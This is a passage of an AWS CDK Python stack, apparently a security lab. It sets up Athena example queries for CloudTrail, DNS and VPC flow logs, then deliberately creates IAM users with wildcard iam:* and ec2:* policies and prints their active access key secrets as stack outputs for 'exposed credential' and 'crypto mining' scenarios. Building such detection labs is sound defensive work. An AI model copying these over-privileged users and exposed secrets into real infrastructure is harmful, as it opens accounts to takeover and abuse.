"CloudTrailQueries", 892 | database=glue_database.database_input.name, 893 | work_group=athena_workgroup.name, 894 | description="Example CloudTrail Athena Queries", 895 | name="CloudTrailExampleQueries", 896 | query_string=sql_string, 897 | ) 898 | cloudtrail_queries.add_dependency(athena_workgroup) 899 | cloudtrail_queries.add_dependency(glue_database) 900 | 901 | with open("analytics/dns/dns_demo_queries.sql") as f: 902 | sql_string = f.read() 903 | f.close() 904 | dns_queries = aws_athena.CfnNamedQuery( 905 | self, 906 | "DNSQueries", 907 | database=glue_database.database_input.name, 908 | work_group=athena_workgroup.name, 909 | description="Example DNS Athena Queries", 910 | name="DNSExampleQueries", 911 | query_string=sql_string, 912 | ) 913 | dns_queries.add_dependency(athena_workgroup) 914 | dns_queries.add_dependency(glue_database) 915 | 916 | with 
open("analytics/vpcflow/vpcflow_demo_queries.sql") as f: 917 | sql_string = f.read() 918 | f.close() 919 | vpcflow_queries = aws_athena.CfnNamedQuery( 920 | self, 921 | "vpcflowQueries", 922 | database=glue_database.database_input.name, 923 | work_group=athena_workgroup.name, 924 | description="Example VPC Flow Athena Queries", 925 | name="VPCFlowExampleQueries", 926 | query_string=sql_string, 927 | ) 928 | vpcflow_queries.add_dependency(athena_workgroup) 929 | vpcflow_queries.add_dependency(glue_database) 930 | 931 | exposed_credential_policy = aws_iam.ManagedPolicy( 932 | self, 933 | "SystemIntegrationPolicy", 934 | statements=[ 935 | aws_iam.PolicyStatement( 936 | sid="AllowIAM", 937 | effect=aws_iam.Effect.ALLOW, 938 | actions=["iam:*"], 939 | resources=["*"] 940 | ) 941 | ] 942 | ) 943 | 944 | exposed_credential = aws_iam.User( 945 | self, 946 | "CredentialExposure", 947 | user_name="integration", 948 | managed_policies=[exposed_credential_policy], 949 | ) 950 | 951 | exposed_credential_access_key = aws_iam.CfnAccessKey( 952 | self, 953 | "CredentialExposureAccessKey", 954 | user_name=exposed_credential.user_name, 955 | serial=None, 956 | status="Active", 957 | ) 958 | 959 | CfnOutput( 960 | self, 961 | "CredentialExposureAccessKeySecret", 962 | description="IAM user access key secret for exposed credential scenario", 963 | value=exposed_credential_access_key.attr_secret_access_key, 964 | ) 965 | 966 | CfnOutput( 967 | self, 968 | "CredentialExposureAccessKeyId", 969 | description="IAM user access key id for exposed credential scenario", 970 | value=exposed_credential_access_key.ref, 971 | ) 972 | 973 | crypto_mining_credential_policy = aws_iam.ManagedPolicy( 974 | self, 975 | "CryptoMiningPolicy", 976 | statements=[ 977 | aws_iam.PolicyStatement( 978 | sid="AllowEC2", 979 | effect=aws_iam.Effect.ALLOW, 980 | actions=["ec2:*"], 981 | resources=["*"] 982 | ) 983 | ] 984 | ) 985 | 986 | crypto_mining_credential = aws_iam.User( 987 | self, 988 | "CryptoMiningCredential", 989 | user_name="pipeline", 990 | managed_policies=[crypto_mining_credential_policy], 991 | ) 992 | 993 | crypto_mining_credential_access_key = aws_iam.CfnAccessKey( 994 | self, 995 | "CryptoMiningAccessKey", 996 | user_name=crypto_mining_credential.user_name, 997 | serial=None, 998 | status="Active", 999 | ) 1000 | 1001 | CfnOutput( 1002 | self, 1003 | "CryptoMiningAccessKeySecret", 1004 | description="IAM user access key secret for crypto mining scenario", 1005 | value=crypto_mining_credential_access_key.attr_secret_access_key, 1006 | ) 1007 | 1008 | CfnOutput( 1009 | self, 1010 | "CryptoMiningAccessKeyId", 1011 | description="IAM user access key id for crypto mining scenario", 1012 | value=crypto_mining_credential_access_key.ref, 1013 | ) --------------------------------------------------------------------------------